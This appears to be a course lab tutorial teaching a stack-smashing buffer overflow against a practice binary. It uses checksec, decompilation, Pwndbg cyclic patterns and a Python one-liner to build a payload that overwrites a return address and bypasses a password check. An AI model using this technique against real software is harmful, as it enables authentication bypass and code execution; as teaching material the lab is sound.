Guided Example
Stack smashing is a type of buffer overflow attack in which an attacker overwrites part of a program's call stack, typically by overflowing a buffer stored on it. By doing so, the attacker can corrupt a return address on the stack and hijack the program's control flow, e.g. to bypass a security check, spawn a shell, or more generally execute malicious code. A classic explanation of the attack can be found in Aleph One’s seminal Phrack article: Smashing The Stack For Fun And Profit.
To demonstrate stack smashing, we assume the following scenario: a program contains a security check (e.g. password or license key verification). We (the attacker) do not know the secret that would let us pass the check legitimately, and there is no simple way to extract it as we did in lab 1. Our goal is therefore to bypass the security check by taking over the program's execution flow. The program is distributed in binary form, and we do not have access to its source code.
Getting and Running the Target Binary
Download this binary.
After the download you may need to give it execution rights with chmod +x smashme01.
This program contains a password check.
The user enters their password attempt as a command line parameter:
./smashme01
usage: ./smashme01 <password>
./smashme01 test
Authentication failed
Analysing the Target Binary with checksec
Let's start by analysing the program with checksec, which is a command-line tool that inspects compiled binaries to display their security-related properties.
If checksec is not already on your machine, install it:
mkdir -p ~/Software
wget https://github.com/slimm609/checksec/tarball/main -O ~/Software/checksec.tar.gz
cd ~/Software && tar xf checksec.tar.gz && mv slimm609-checksec-* checksec
echo "alias checksec=~/Software/checksec/checksec.bash" >> ~/.bashrc
source ~/.bashrc
Adapt these steps to your environment (e.g. you may use a different shell).
checksec --file=smashme01
RELRO           STACK CANARY      NX            PIE      RPATH      RUNPATH      Symbols     FORTIFY  Fortified  Fortifiable  FILE
Partial RELRO   No canary found   NX disabled   No PIE   No RPATH   No RUNPATH   5 Symbols   No       0          2            smashme01
This looks promising. Here we can see that:
- The stack canary, which is a protection against buffer overflows on the stack, is disabled. It means we will be able to exploit such overflows.
- The binary is not a Position Independent Executable (PIE). This build-time option, when enabled, allows the location where the binary is loaded in the address space to be randomised (i.e. different) each time the program is launched. No randomisation means we will mostly get the same memory layout across executions, which makes the program easier to study.
- Symbols are present: symbols are things like function and global variable names. The fact that they are present in the binary means that disassembly/decompilation will be able to do a better job, e.g. break down the code section into functions, identify them by their name, etc.
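As a rough illustration of what the PIE column reflects, the sketch below reads the `e_type` field of an ELF header: fixed-address executables use `ET_EXEC`, while position-independent ones use `ET_DYN`. This is only a heuristic written for this example (the helper names are made up, and shared libraries are also `ET_DYN`); it is not how checksec itself is implemented.

```python
import struct

ET_EXEC = 2  # executable loaded at a fixed address (no PIE)
ET_DYN = 3   # shared object or position-independent executable

def elf_type(header: bytes) -> int:
    """Return the e_type field of an ELF header (the first 18 bytes suffice)."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[5] (EI_DATA): 1 = little-endian, 2 = big-endian
    endian = "<" if header[5] == 1 else ">"
    # e_type is a 16-bit field stored right after the 16-byte e_ident array
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type

def looks_like_pie(header: bytes) -> bool:
    return elf_type(header) == ET_DYN

# Synthetic 64-bit little-endian header with e_type = ET_EXEC, for illustration only
fake_header = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9) + struct.pack("<H", ET_EXEC)
print(looks_like_pie(fake_header))  # False
```

On the real target, the header could be obtained with `open("smashme01", "rb").read(18)`.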
Disassembling and Decompiling the Target Binary
If we disassemble the program with objdump, we can see that it is made up of a few functions, including:
- main
- init
- validate
- do_important_stuff
- Other functions whose names cannot be recovered
Let's study a few of these functions in more detail.
Decompiling the program (e.g. with RetDec) will allow us to get a better understanding of what they do.
Let's start by looking at main.
Decompiled by RetDec, it looks like this (you may see different values for the addresses):
// Address range: 0x401a94 - 0x401b21
int main(int argc, char ** argv) {
    int64_t * v1 = (int64_t *)((int64_t)argv + 8); // 0x401add
    init(*v1);
    if ((int32_t)validate(*v1) == 0) {
        // 0x401b0b
        puts("Authentication failed");
    } else {
        // 0x401aff
        do_important_stuff();
    }
    // 0x401b1a
    return 0;
}
We can see that main gets the first command line argument from argv (argv + 8 corresponds to argv[1], since each pointer occupies 8 bytes on x86-64), passes it to init, then to validate.
If validate returns 0, it prints Authentication failed, else it calls do_important_stuff.
Decompiled, do_important_stuff looks like this:
int64_t do_important_stuff(void) {
    // 0x401a06
    puts("Authentication successful");
    // ...
}
Clearly, this function is executed on the code path taken when authentication succeeds: that will be where we want to jump when we hijack the execution flow.
Now let's look at validate:
int64_t validate(int64_t str) {
    int64_t result = 0; // 0x4018bc
    if (strlen((char *)str) == 40) {
        // 0x4018c5
        int64_t str2; // bp-152, 0x401885
        function_4016aa(str, &str2);
        result = memcmp(&g1, &str2, 40) == 0;
    }
    // 0x401905
    return result;
}
This function performs a length check on the password attempt (str), then passes it as a parameter to another function (function_4016aa) alongside the address of a local variable str2.
The local variable is then compared with memcmp to a global variable g1, and validate returns 0 if the comparison fails (memcmp returned something other than 0), and 1 if it succeeds (memcmp returned 0).
Recall that from how it is called in main, we know that validate returns 0 if the authentication failed, and something else if it succeeded.
The validate function presents a structure typical of a hash check: the password attempt str is hashed into str2, and that hash is compared to g1 which is probably the hash of the correct password.
We can also conclude that function_4016aa implements the hashing logic.
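To make the structure of this check concrete, here is a minimal Python model of validate. The hash function is an assumption: SHA-1's hex digest stands in for function_4016aa only because it happens to be 40 bytes long, and EXPECTED plays the role of g1, derived here from a made-up password. Neither reflects what the real binary does.

```python
import hashlib

def toy_hash(attempt: bytes) -> bytes:
    # Stand-in for function_4016aa (assumption): a 40-byte SHA-1 hex digest
    return hashlib.sha1(attempt).hexdigest().encode()

# Plays the role of g1; computed from a made-up 40-character password
EXPECTED = toy_hash(b"p" * 40)

def validate(attempt: bytes) -> int:
    result = 0
    if len(attempt) == 40:                        # strlen(str) == 40
        digest = toy_hash(attempt)                # function_4016aa(str, &str2)
        result = int(digest[:40] == EXPECTED[:40])  # memcmp(&g1, &str2, 40) == 0
    return result

print(validate(b"test"))     # 0: wrong length, the hash is never computed
print(validate(b"q" * 40))   # 0: right length, wrong hash
print(validate(b"p" * 40))   # 1: matches the expected hash
```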
Although we can extract the hash of the correct password, we won't be able to crack it with a bruteforce or dictionary attack: for this exercise the passwords have been generated to be long and complex enough to be uncrackable in a reasonable time.
Moreover, the hashing method seems custom and hard to reverse-engineer (function_4016aa is quite complex).
Instead, we are going to attempt to entirely bypass the check, i.e. force the CPU to jump directly to do_important_stuff without calling validate and checking its return value.
Let's now have a look at init:
int64_t init(int64_t str2) {
    // 0x401a6e
    int64_t str; // bp-40, 0x401a6e
    return (int64_t)strcpy((char *)&str, (char *)str2);
}
This function calls strcpy to copy the password attempt coming from the command line (str2) into str, a local buffer located on the stack (bp is the base pointer, which at runtime points to the base of the stack frame of the function being executed).
strcpy copies bytes until it reaches the null terminator of the source string, regardless of the size of the destination. str is a buffer of fixed size, and as we can observe the program makes no attempt to check that str2 fits in that buffer.
To try to trigger the overflow, call the program with an abnormally long string given as password attempt:
./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[1] 20866 segmentation fault ./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Function Calls and the Stack
Recall from the lectures that the machine code generated by the compiler pushes the return address on the stack upon a function call, and pops it then jumps to it when that function returns:
So with our target program, to bypass the validation of the password attempt, our goal will be to overflow the buffer during init's execution, through the strcpy, in such a way that the return address is replaced with the address of our target: do_important_stuff.
When init then returns, the CPU will jump to do_important_stuff, bypassing the password check.
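The effect of the overflow on the return address can be simulated in a few lines of Python. The frame layout used here (a 32-byte buffer directly followed by the saved base pointer, then the return address) and the saved RBP value are assumptions made for illustration; the real distances have to be measured on the binary. All function names are made up for this sketch.

```python
import struct

BUF_SIZE = 32              # assumed size of the local buffer
SAVED_RBP_OFF = BUF_SIZE   # saved base pointer right after the buffer
RET_OFF = BUF_SIZE + 8     # return address right after the saved base pointer

def make_frame(ret_addr: int) -> bytearray:
    """Build a toy stack frame: buffer, saved RBP, return address."""
    frame = bytearray(RET_OFF + 8)
    struct.pack_into("<Q", frame, SAVED_RBP_OFF, 0x7FFFFFFFDB40)  # made-up value
    struct.pack_into("<Q", frame, RET_OFF, ret_addr)
    return frame

def unsafe_strcpy(frame: bytearray, src: bytes) -> None:
    """Copy src and a terminating null byte to the buffer, with no size check."""
    data = src.split(b"\x00")[0] + b"\x00"
    frame[0:len(data)] = data

def return_address(frame: bytearray) -> int:
    return struct.unpack_from("<Q", frame, RET_OFF)[0]

frame = make_frame(0x401AE8)
unsafe_strcpy(frame, b"xxx")
print(hex(return_address(frame)))   # 0x401ae8: a short input leaves it intact

unsafe_strcpy(frame, b"A" * 40 + b"\x06\x1a\x40")
print(hex(return_address(frame)))   # 0x401a06: the return address was replaced
```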
Understanding the Address Space Layout
Attack Payload: Overview
We have control over the data that will be written on the stack through the overflow, since that data comes from the command line argument passed to the program. The question is what exactly we should pass as command line parameter so that the address of the function we want to jump to ends up written exactly in the return address slot. This is our payload, and we need to determine 1) how long it should be and 2) what it should contain for the attack to succeed. Our payload should be a concatenation of two things:
- A certain amount of padding corresponding to the distance between the start of the buffer we overflow and the return address slot on the stack (see diagram above).
- The address of do_important_stuff, to be written in the return address slot.
Determining the address of do_important_stuff is easy: from our investigation with checksec we know that the program is not compiled as a PIE, so the address of do_important_stuff will be the same across invocations of the program.
It can be determined e.g. in objdump's output:
objdump --disassemble smashme01 | grep do_important_stuff
0000000000401a06 <do_important_stuff>:
Here its address is 0x401a06 (it may be different on your computer).
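If you prefer to extract that address programmatically, the following sketch parses a function header line from objdump's output. The helper name symbol_address is made up for this example, and the sample text simply reuses the line shown above.

```python
import re

def symbol_address(objdump_output: str, name: str) -> int:
    """Return the address of function `name` from `objdump --disassemble` text."""
    # Function headers look like: 0000000000401a06 <do_important_stuff>:
    pattern = re.compile(
        r"^([0-9a-fA-F]+) <" + re.escape(name) + r">:$", re.MULTILINE
    )
    match = pattern.search(objdump_output)
    if match is None:
        raise KeyError(name)
    return int(match.group(1), 16)

sample = "0000000000401a06 <do_important_stuff>:\n"
print(hex(symbol_address(sample, "do_important_stuff")))  # 0x401a06
```

The real output could be captured with `subprocess.run(["objdump", "--disassemble", "smashme01"], capture_output=True, text=True).stdout` and passed as the first argument.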
To determine how much padding our payload should contain before that address, we need to understand the memory layout of the stack at the time the overflow occurs. To that end we will use GDB and an add-on called Pwndbg, which offers a better interface and many helpful features for reverse engineering.
Installing and Running Pwndbg
To install Pwndbg download a release as follows:
mkdir -p ~/Software
cd ~/Software
wget https://github.com/pwndbg/pwndbg/releases/download/2025.04.18/pwndbg_2025.04.18_x86_64-portable.tar.xz
tar xf pwndbg_2025.04.18_x86_64-portable.tar.xz && rm pwndbg_2025.04.18_x86_64-portable.tar.xz
echo "export PATH=\$PATH:~/Software/pwndbg/bin" >> ~/.bashrc
source ~/.bashrc
Pwndbg can then be launched as follows:
pwndbg smashme01
pwndbg>
To explore Pwndbg's interface, place a breakpoint on main and run the program until it is hit:
pwndbg> break main
pwndbg> run
Breakpoint 1, 0x0000000000401a9c in main ()
Once the breakpoint is hit, Pwndbg displays a lot more information than vanilla GDB. The screen is divided into 4 main blocks:
- REGISTERS displays the content of the registers: the general purpose ones RAX to R15, the base pointer RBP, the stack pointer RSP, as well as the instruction pointer RIP.
- DISASM displays a disassembly of the machine code, with the next instruction to be executed having its address highlighted in green.
- STACK gives the content of the stack, one stack slot per line. The address of each slot is given on the left, and its content on the right. The first line represents the top of the stack; notice that its address is the same as the content of the stack pointer register RSP.
- BACKTRACE shows the function call stack: the CPU is currently running code belonging to main, which was called by __libc_start_call_main, which itself was called by __libc_start_main, which was called by _start. These last 3 functions implement the C standard library code that runs before main is invoked.
Pwndbg supports all GDB commands (e.g. break, run, etc.) and provides additional ones.
You can explore these commands on this cheat sheet and on the relevant documentation.
Determining the Amount of Padding
Let's start by setting a breakpoint in the function containing the overflow, init, and run the program with a dummy password, xxx.
pwndbg> break init
Breakpoint 1 at 0x401a76
pwndbg> run xxx
When the breakpoint is hit, use the ni command to continue execution until the call to strcpy is highlighted, i.e. right before that call is made:
► 0x401a8c <init+30> call strcpy@plt <strcpy@plt>
dest: 0x7fffffffdaf0 ◂— 0
src: 0x7fffffffe00a ◂— 0x474e414c00787878 /* 'xxx' */
Pwndbg is aware of the calling convention and indicates the value of strcpy's parameters:
- The source src points to the dummy password attempt we entered, xxx.
- The destination dest points to the buffer that we are going to overflow; here its value is 0x7fffffffdaf0.
Now to understand how much padding we need to include in our payload, we need to know how many bytes separate 0x7fffffffdaf0 from the location of the return address on the stack.
The return address is stored in the stack slot just above the saved base pointer, i.e. 8 bytes above the address held in RBP, so we can display it with the following command:
pwndbg> x/gx $rbp+8
0x7fffffffdb18: 0x0000000000401ae8
Remember that the stack grows down: the return address was pushed right before the saved base pointer, so it sits 8 bytes higher in memory, at $rbp+8.
The return address is therefore 0x401ae8 (the location in main where execution resumes after the call to init), and it is stored on the stack at 0x7fffffffdb18.
We can now compute the distance between the location of the return address, 0x7fffffffdb18, and the first byte of the buffer we are going to overflow, 0x7fffffffdaf0.
In a separate terminal:
$ python3 -c "print(0x7fffffffdb18 - 0x7fffffffdaf0)"
40
Our payload will then be 40 bytes of padding, followed by the address of do_important_stuff.
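The same arithmetic can be broken down to show where the 40 bytes come from, using the addresses observed in the session above (they may differ on your machine). The variable names are chosen for this sketch only.

```python
dest = 0x7FFFFFFFDAF0       # first byte of the buffer (strcpy's dest)
ret_slot = 0x7FFFFFFFDB18   # location of the return address ($rbp+8)

rbp = ret_slot - 8          # value of RBP inside init
buffer_to_rbp = rbp - dest  # bytes between the buffer start and the saved RBP
padding = ret_slot - dest   # bytes to write before reaching the return address

print(hex(rbp), buffer_to_rbp, padding)  # 0x7fffffffdb10 32 40
```

In other words, the padding covers 32 bytes up to the saved base pointer, plus the 8 bytes of the saved base pointer itself.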
Smashing the Stack
We determined earlier the address of do_important_stuff to be 0x401a06, so the execution of our attack is as follows:
$ ./smashme01 $'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x06\x1a\x40\x00\x00\x00\x00\x00'
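The first 40 characters (each 1 byte) can be anything. Notice how the address we want to jump to is written backwards. This is because x86-64 is little-endian: the least significant byte of a multi-byte data type is stored at the lowest memory address. Note that the trailing \x00 bytes never actually reach the program, since a command line argument ends at its first null byte; the attack still works because strcpy appends a terminating null byte and the upper bytes of the original return address (0x401ae8) are already zero.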
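The byte order can be checked quickly with Python's struct module, which packs an integer into its in-memory representation. This is just an illustration of the encoding, using the target address found earlier.

```python
import struct

target = 0x401A06

little = struct.pack("<Q", target)  # 64-bit unsigned, little-endian
big = struct.pack(">Q", target)     # same value, big-endian, for contrast

print(little)  # b'\x06\x1a@\x00\x00\x00\x00\x00'  ('@' is byte 0x40)
print(big)     # b'\x00\x00\x00\x00\x00@\x1a\x06'

# Reading the little-endian bytes back yields the original address
print(hex(int.from_bytes(little, "little")))  # 0x401a06
```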
The program should display the password that you have to submit to validate the exercise.
An Easier Way to Determine Padding Size
Determining the amount of padding manually as we did can be quite cumbersome. An easier method, provided by Pwndbg, is to use a cyclic pattern: a long sequence of characters in which every subsequence of a given length (here 8 bytes) is unique, and which we will use to overflow the buffer. Looking at which part of that sequence ends up overwriting the return address lets Pwndbg easily compute the distance between the start of the overflowed buffer and the return address location.
To generate the cyclic pattern, we can use the built-in cyclic function within pwndbg.
This is an example for generating 200 bytes of cyclic pattern:
pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
⚠️ For some reason, using cyclic before having run the program in a Pwndbg session at least once leads to problems. Each time you launch Pwndbg, make sure to type run at least once before using cyclic.
Your cyclic function may generate a different pattern.
Now run the program and copy-paste the pattern as its command line parameter:
pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
Part of this pattern will overwrite the return address, and the CPU will then try to jump to the overwritten value. Because it does not correspond to a valid address, the program will crash and Pwndbg will show us where the CPU tried to jump:
► 0x401a93 <init+37> ret <0x6161616161616166>
This is the subset of the pattern (in hexadecimal) that overwrote the return address. Pwndbg has a convenient function to locate the offset of that subset from the start of the last pattern generated:
pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40
And there we have it: this is the distance between the start of the overflowed buffer and the return address, i.e. the amount of padding required for our payload.
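The idea behind the offset lookup can be sketched in Python. The generator below is a simplified stand-in, not Pwndbg's implementation: it only produces the chunks 'aaaaaaaa', 'baaaaaaa', 'caaaaaaa', and so on, which matches the pattern shown above for short lengths (up to 208 bytes). Both function names are made up for this example.

```python
import string

def simple_cyclic(length: int) -> bytes:
    """Simplified pattern made of 8-byte chunks: one letter followed by 7 'a'."""
    if length > 8 * 26:
        raise ValueError("this simplified generator supports at most 208 bytes")
    chunks = [letter + "a" * 7 for letter in string.ascii_lowercase]
    return "".join(chunks).encode()[:length]

def simple_cyclic_find(value: int, pattern: bytes) -> int:
    """Locate the 8 bytes that ended up in a register, given as an integer."""
    # The register value is the little-endian reading of 8 pattern bytes
    needle = value.to_bytes(8, "little")
    return pattern.find(needle)

pattern = simple_cyclic(200)
print(pattern[:24])                                      # b'aaaaaaaabaaaaaaacaaaaaaa'
print(simple_cyclic_find(0x6161616161616166, pattern))   # 40
```

The value 0x6161616161616166 corresponds to the bytes 'faaaaaaa' in memory, and the only place they appear in the pattern is at offset 40.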
Quick Payload Generation with Python
Rather than writing the payload manually, a quick and easy way to generate it is with Python, writing the payload to a file:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + (0x401a06).to_bytes(8, 'little'))" > input.txt
$ ./smashme01 $(cat input.txt)
Here 40 is the amount of padding added, and 0x401a06 is our jump target.
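Because the payload travels through a shell command substitution and ends up as a C string, some byte values would not survive the trip: a null byte ends the argument, and unquoted whitespace bytes are split by the shell into separate arguments. The sketch below (helper names are made up for this example) builds the payload and flags such bytes, ignoring the trailing zero bytes of the address.

```python
def build_payload(padding: int, target: int) -> bytes:
    """Padding followed by the 8-byte little-endian jump target."""
    return b"A" * padding + target.to_bytes(8, "little")

def argv_problems(payload: bytes) -> list:
    """List (offset, reason) pairs for bytes unsafe in `./prog $(cat file)`."""
    body = payload.rstrip(b"\x00")  # trailing zero bytes are cut off anyway
    problems = []
    for offset, byte in enumerate(body):
        if byte == 0:
            problems.append((offset, "null byte ends the argument"))
        elif byte in b" \t\n":
            problems.append((offset, "whitespace is split by the shell"))
    return problems

payload = build_payload(40, 0x401A06)
print(len(payload))             # 48
print(argv_problems(payload))   # []: this payload can be passed as is

# A hypothetical target whose address contains a newline byte (0x0a)
print(argv_problems(build_payload(40, 0x400A06)))
```

If a problematic byte is reported, a different jump target or another way of delivering the input would be needed.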
Submission Instructions
Input the password extracted on the corresponding line of the CSV file in the submission git repository, i.e.:
smashme01,password-here